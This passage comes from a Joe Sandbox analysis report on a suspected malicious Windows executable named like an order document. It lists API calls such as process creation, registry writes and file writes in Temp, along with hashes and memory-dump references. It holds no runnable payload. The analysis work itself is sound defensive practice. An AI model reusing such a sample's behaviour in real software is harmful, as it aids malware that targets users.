                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_pedido-035241.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: CloseQueryValue
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 3356406503-0
                                                                                                                                                                            • Opcode ID: 06d9a8ad9cd75b344e281f0f33afa87d54a5442f7653d28a97a29c4d8ae17323
                                                                                                                                                                            • Instruction ID: f1f7847c69b95e8b88bdf62be751073741875666d26e4aee14b76084b72d5d95
                                                                                                                                                                            • Opcode Fuzzy Hash: 06d9a8ad9cd75b344e281f0f33afa87d54a5442f7653d28a97a29c4d8ae17323
                                                                                                                                                                            • Instruction Fuzzy Hash: E2116D71900219EBDF14DFA4DE589AE7774FF04345B20443BE401B62D0E7B88A45EB5E
                                                                                                                                                                            APIs
                                                                                                                                                                            • MulDiv.KERNEL32(00007530,00000000,00000000), ref: 004013E4
                                                                                                                                                                            • SendMessageW.USER32(?,00000402,00000000), ref: 004013F4
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.1767234749.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.1767216652.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1767257386.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1767273614.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1767273614.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1767273614.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1767273614.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1767273614.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1767273614.0000000000450000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1767408008.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_pedido-035241.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: MessageSend
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 3850602802-0
                                                                                                                                                                            • Opcode ID: 970bce7bfd6110042ba11e2ba34b1580a3262637bb8a43ad7db674ac8d0d0c57
                                                                                                                                                                            • Instruction ID: 40daf909c284af41af5c9cdf7f458e0296b91398e9c9917f7ae767538e8fd086
                                                                                                                                                                            • Opcode Fuzzy Hash: 970bce7bfd6110042ba11e2ba34b1580a3262637bb8a43ad7db674ac8d0d0c57
                                                                                                                                                                            • Instruction Fuzzy Hash: 1A01D131724220EBEB194B389D09B2A3698E710318F10867AF855F66F1E6788C129B5C
                                                                                                                                                                            APIs
                                                                                                                                                                            • OleInitialize.OLE32(00000000), ref: 0040564C
                                                                                                                                                                              • Part of subcall function 004044AF: SendMessageW.USER32(?,00000000,00000000,00000000), ref: 004044C1
                                                                                                                                                                            • CoUninitialize.COMBASE(00000404,00000000,?,00000000,?), ref: 00405698
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.1767234749.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.1767216652.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1767257386.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1767273614.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1767273614.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1767273614.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1767273614.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1767273614.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1767273614.0000000000450000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1767408008.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_pedido-035241.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: InitializeMessageSendUninitialize
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 2896919175-0
                                                                                                                                                                            • Opcode ID: a1e7d01539343cbedca50b7a5125379b8eaabd142d8c7e4c73993699b28e4919
                                                                                                                                                                            • Instruction ID: e8a19e3ae465cdfca2bef1253819f9a2a21047bc58a71dd1e8c92fd5a8ca6894
                                                                                                                                                                            • Opcode Fuzzy Hash: a1e7d01539343cbedca50b7a5125379b8eaabd142d8c7e4c73993699b28e4919
                                                                                                                                                                            • Instruction Fuzzy Hash: EFF0F0B2600600DBE3115754A901B677364EB80304F85497AEF88623E1CB3B0C128A2E
                                                                                                                                                                            APIs
                                                                                                                                                                            • ShowWindow.USER32(00000000,00000000), ref: 00401EFC
                                                                                                                                                                            • EnableWindow.USER32(00000000,00000000), ref: 00401F07
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.1767234749.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.1767216652.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1767257386.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1767273614.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1767273614.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1767273614.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1767273614.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1767273614.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1767273614.0000000000450000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1767408008.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_pedido-035241.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: Window$EnableShow
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 1136574915-0
                                                                                                                                                                            • Opcode ID: d503c9f13438e3c869f1bbfba4ca0b9980fccaccea62ec0994004058657006bf
                                                                                                                                                                            • Instruction ID: 5d3c5223d4adea09edd48fe2ddafa99b3fbee87e2958761c9001e4fb32d1ad87
                                                                                                                                                                            • Opcode Fuzzy Hash: d503c9f13438e3c869f1bbfba4ca0b9980fccaccea62ec0994004058657006bf
                                                                                                                                                                            • Instruction Fuzzy Hash: C3E0D872908201CFE705EBA4EE485AE73F4EF40315710097FE401F11D1DBB54C00866D
                                                                                                                                                                            APIs
                                                                                                                                                                            • CreateProcessW.KERNELBASE(00000000,?,00000000,00000000,00000000,04000000,00000000,00000000,00426710,00000000,00000000), ref: 00405B13
                                                                                                                                                                            • CloseHandle.KERNEL32(?), ref: 00405B20
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.1767234749.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.1767216652.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1767257386.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1767273614.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1767273614.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1767273614.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1767273614.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1767273614.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1767273614.0000000000450000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1767408008.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_pedido-035241.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: CloseCreateHandleProcess
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 3712363035-0
                                                                                                                                                                            • Opcode ID: 0e81a11ecc4c6fe7d2bd14f7f4550c250266fb7a2a5fb983bdda8c5a8ca6adfb
                                                                                                                                                                            • Instruction ID: 90cc6d476167cb297d6b140a5f1e3d8b94c2ff7c6bb70ea469832da4d223c92c
                                                                                                                                                                            • Opcode Fuzzy Hash: 0e81a11ecc4c6fe7d2bd14f7f4550c250266fb7a2a5fb983bdda8c5a8ca6adfb
                                                                                                                                                                            • Instruction Fuzzy Hash: F2E0BFB46002097FEB109B64ED45F7B77BCEB04608F414465BD54F6150DB74A9158E7C
                                                                                                                                                                            APIs
                                                                                                                                                                            • GetModuleHandleA.KERNEL32(?,00000020,?,00403607,0000000B), ref: 004068E6
                                                                                                                                                                            • GetProcAddress.KERNEL32(00000000,?), ref: 00406901
                                                                                                                                                                              • Part of subcall function 00406864: GetSystemDirectoryW.KERNEL32(?,00000104), ref: 0040687B
                                                                                                                                                                              • Part of subcall function 00406864: wsprintfW.USER32 ref: 004068B6
                                                                                                                                                                              • Part of subcall function 00406864: LoadLibraryExW.KERNEL32(?,00000000,00000008), ref: 004068CA
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.1767234749.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.1767216652.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1767257386.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1767273614.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1767273614.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1767273614.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1767273614.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1767273614.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1767273614.0000000000450000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1767408008.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_pedido-035241.jbxd
Similarity
• API ID: AddressDirectoryHandleLibraryLoadModuleProcSystemwsprintf
• String ID:
• API String ID: 2547128583-0
• Opcode ID: c7c26614299f557633109f7ac2ccf4e744cd73af09153470ea8035ac80f12020
• Instruction ID: b54d22b37b479e59566a9631c032e51b8c6cd741f5ea0e4d018af200ac078f8b
• Instruction Fuzzy Hash: 48E086335042109AE21197715D44C7B73A8AF89650307443EF947F2080DB38DC31A669
APIs
• GetFileAttributesW.KERNELBASE(00000003,004030BD,C:\Users\user\Desktop\pedido-035241.exe,80000000,00000003,?,?,?,?,?,00403847,?), ref: 00405FFB
• CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,?,?,?,?,00403847,?), ref: 0040601D
Memory Dump Source
• Source File: 00000000.00000002.1767234749.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_pedido-035241.jbxd
Similarity
• API ID: File$AttributesCreate
• String ID:
• API String ID: 415043291-0
• Opcode ID: 080dfadfdaad2818d5b04c51cfada36c475993ea7ffea5996e238fb5a0e3a6c4
• Instruction ID: 1030bc0f2bf25390ef9c6131bda9d6cfedcac9e68b753c15eded60bf4a570351
• Instruction Fuzzy Hash: 5ED09E31254201AFEF098F20DE16F2E7BA2EB94B04F11552CB786941E0DAB15C199B15
APIs
• GetFileAttributesW.KERNELBASE(?,?,00405BD7,?,?,00000000,00405DAD,?,?,?,?), ref: 00405FD7
• SetFileAttributesW.KERNEL32(?,00000000), ref: 00405FEB
Memory Dump Source
• Source File: 00000000.00000002.1767234749.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_pedido-035241.jbxd
Similarity
• API ID: AttributesFile
• String ID:
• API String ID: 3188754299-0
• Opcode ID: a764032cc0ce64e7f87df91ab84dfb27e8fca44cfd77f22972d2dc2d25b91850
• Instruction ID: 846b50f6ec280e5947384c74444241e6b9796591039fc91e932c01759f2cc32f
• Instruction Fuzzy Hash: 2CD0C972504531ABC2102728EE0889BBB55EF642717054A35FAA5A22B0CB304C529E98
APIs
• CreateDirectoryW.KERNELBASE(?,00000000,004034EA,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004037DA), ref: 00405ABB
• GetLastError.KERNEL32 ref: 00405AC9
Memory Dump Source
• Source File: 00000000.00000002.1767234749.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_pedido-035241.jbxd
Similarity
• API ID: CreateDirectoryErrorLast
• String ID:
• API String ID: 1375471231-0
• Opcode ID: a5afa482e644e9a10fedfab033ae5dbb8931bf23a9e1c5533d9f8c1a63861871
• Instruction ID: 81e7360d8487983dd45b28c0c59a41c1d83062ba9acea414cf4290cf05fa9266
• Instruction Fuzzy Hash: C3C04C30314601AED7505B609E48B177EA19B94741F1A85396146E41A4DA389455DD2D
APIs
• WritePrivateProfileStringW.KERNEL32(00000000,00000000,?,00000000), ref: 004023E9
Memory Dump Source
• Source File: 00000000.00000002.1767234749.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_pedido-035241.jbxd
Similarity
• API ID: PrivateProfileStringWrite
• String ID:
• API String ID: 390214022-0
• Opcode ID: 498f41ba95d1dc934bc83887be66b3af98def7cf3aba53834c7129a1bd888199
• Instruction ID: de4cb5ca612a6b97b91745c8380e1d92b079ec7b797fcdaf288f77766e75fad7
• Instruction Fuzzy Hash: FAE04F31900124BBDF603AB11F8DEAE205C6FC6744B18013EF911BA1C2E9FC8C4146AD
APIs
• RegCreateKeyExW.KERNELBASE(00000000,?,00000000,00000000,00000000,?,00000000,?,00000000,?,?,?,00402E57,00000000,?,?), ref: 004063CB
Memory Dump Source
• Source File: 00000000.00000002.1767234749.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_pedido-035241.jbxd
Similarity
• API ID: Create
• String ID:
• API String ID: 2289755597-0
• Opcode ID: f0170b29b94a961cdf0cc122a920c286c7e5b726b195fdee8f598fb45efbb6e4
• Instruction ID: 33fcb2899acb2d8a51dea3519172d90e3aaf79576ce2bf617fe5633813c3fc69
• Instruction Fuzzy Hash: 40E0BF72010109BEDF195F50ED0AD7B3A1DE704300F01452EB906D4051E6B5A9306664
APIs
• ReadFile.KERNELBASE(00000000,00000000,00000004,00000004,00000000,000000FF,?,004034AC,00000000,00000000,00403303,000000FF,00000004,00000000,00000000,00000000), ref: 0040608E
Memory Dump Source
• Source File: 00000000.00000002.1767234749.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.1767216652.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1767257386.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1767273614.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1767273614.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1767273614.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1767273614.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1767273614.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1767273614.0000000000450000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1767408008.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_pedido-035241.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: FileRead
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 2738559852-0
                                                                                                                                                                            • Opcode ID: 0024165f2f5d2011be9120f41fe866c54f7b8e58de784a1218c53157080e4b8c
                                                                                                                                                                            • Instruction ID: c8e4d841af9964a9af1d27d101842a5e1860e0780d1899a5c61b78fe641b59a9
                                                                                                                                                                            • Opcode Fuzzy Hash: 0024165f2f5d2011be9120f41fe866c54f7b8e58de784a1218c53157080e4b8c
                                                                                                                                                                            • Instruction Fuzzy Hash: 84E08632140219ABCF10EE518C00EEB379CFF01390F054432F911E2140D638E92187A4
                                                                                                                                                                            APIs
                                                                                                                                                                            • WriteFile.KERNELBASE(00000000,00000000,00000004,00000004,00000000,?,?,0040347A,00000000,00414EC0,?,00414EC0,?,000000FF,00000004,00000000), ref: 004060BD
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.1767234749.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.1767216652.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1767257386.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1767273614.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1767273614.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1767273614.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1767273614.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1767273614.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1767273614.0000000000450000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1767408008.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_pedido-035241.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: FileWrite
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 3934441357-0
                                                                                                                                                                            • Opcode ID: 3dec9289c2e50997f5b7f42c7d661c3d3292bfbb80aff78175bf8fde073ef60e
                                                                                                                                                                            • Instruction ID: 36c6d552b97af02dd58307b05a598db1695570393df740455f8c701413f3969e
                                                                                                                                                                            • Opcode Fuzzy Hash: 3dec9289c2e50997f5b7f42c7d661c3d3292bfbb80aff78175bf8fde073ef60e
                                                                                                                                                                            • Instruction Fuzzy Hash: AFE0E632150169ABDF10DE559C00EEB775CEB05351F014476F955E3150DA31E87197A5
                                                                                                                                                                            APIs
                                                                                                                                                                            • RegOpenKeyExW.KERNELBASE(00000000,00000000,00000000,?,?,?,?,?,00406402,?,00000000,?,?,: Completed,?), ref: 00406398
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.1767234749.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.1767216652.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1767257386.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1767273614.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1767273614.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1767273614.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1767273614.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1767273614.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1767273614.0000000000450000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1767408008.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_pedido-035241.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: Open
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 71445658-0
                                                                                                                                                                            • Opcode ID: 759d75b29ffd137612e455953a298f0698f5beae901813cd77d6ec234b014f3e
                                                                                                                                                                            • Instruction ID: 95f024e915835d806257714b27b18acfdec26fcf9bd71fa5ecdde53cd8054228
                                                                                                                                                                            • Opcode Fuzzy Hash: 759d75b29ffd137612e455953a298f0698f5beae901813cd77d6ec234b014f3e
                                                                                                                                                                            • Instruction Fuzzy Hash: 00D0123210030DBBDF11AF90DD01FAB3B1DAB08310F014436FE06A5091D776D530AB64
                                                                                                                                                                            APIs
                                                                                                                                                                            • SetFileAttributesW.KERNELBASE(00000000,?,000000F0), ref: 004015AE
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.1767234749.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.1767216652.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1767257386.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1767273614.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1767273614.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1767273614.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1767273614.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1767273614.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1767273614.0000000000450000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1767408008.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_pedido-035241.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: AttributesFile
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 3188754299-0
                                                                                                                                                                            • Opcode ID: 9ed813dc5e0ae011bbb39e354fb2185b2751a29f1249f91cdd763d9aa28b90ef
                                                                                                                                                                            • Instruction ID: dab120aab1e819a0f3e7a590800bcc330433e48d8fa1e5c71f26214da8b737bd
                                                                                                                                                                            • Opcode Fuzzy Hash: 9ed813dc5e0ae011bbb39e354fb2185b2751a29f1249f91cdd763d9aa28b90ef
                                                                                                                                                                            • Instruction Fuzzy Hash: B4D01272B08110DBDB11DBA8AA48B9D72A4AB50364B208537D111F61D0E6B9C5559619
                                                                                                                                                                            APIs
                                                                                                                                                                              • Part of subcall function 00406544: lstrcatW.KERNEL32(: Completed,\Microsoft\Internet Explorer\Quick Launch), ref: 004066E9
                                                                                                                                                                              • Part of subcall function 00406544: lstrlenW.KERNEL32(: Completed,00000000,Completed,?,004055A0,Completed,00000000), ref: 00406743
                                                                                                                                                                            • SetDlgItemTextW.USER32(?,?,00000000), ref: 0040447D
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.1767234749.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.1767216652.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1767257386.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1767273614.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1767273614.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1767273614.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1767273614.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1767273614.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1767273614.0000000000450000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1767408008.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_pedido-035241.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: ItemTextlstrcatlstrlen
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 281422827-0
                                                                                                                                                                            • Opcode ID: 26cd6fd2a30a9edae1afc01185c8e6693b4f27573a3b41b2952906fd053f54dd
                                                                                                                                                                            • Instruction ID: a894ff31b73895be19cc099c8c24ae83fb845b4aca8af963ae3db1ea54c4578e
                                                                                                                                                                            • Opcode Fuzzy Hash: 26cd6fd2a30a9edae1afc01185c8e6693b4f27573a3b41b2952906fd053f54dd
                                                                                                                                                                            • Instruction Fuzzy Hash: F6C08C31048200BFD281A704CC42F1FF3E8EF9031AF00C42EB15CE00D1C63494208A26
                                                                                                                                                                            APIs
                                                                                                                                                                            • SendMessageW.USER32(?,00000000,00000000,00000000), ref: 004044C1
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.1767234749.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.1767216652.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
• Associated: 00000000.00000002.1767257386.0000000000408000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1767273614.000000000040A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1767273614.0000000000422000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1767273614.0000000000427000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1767273614.000000000042C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1767273614.0000000000434000.00000004.00000001.01000000.00000003.sdmp
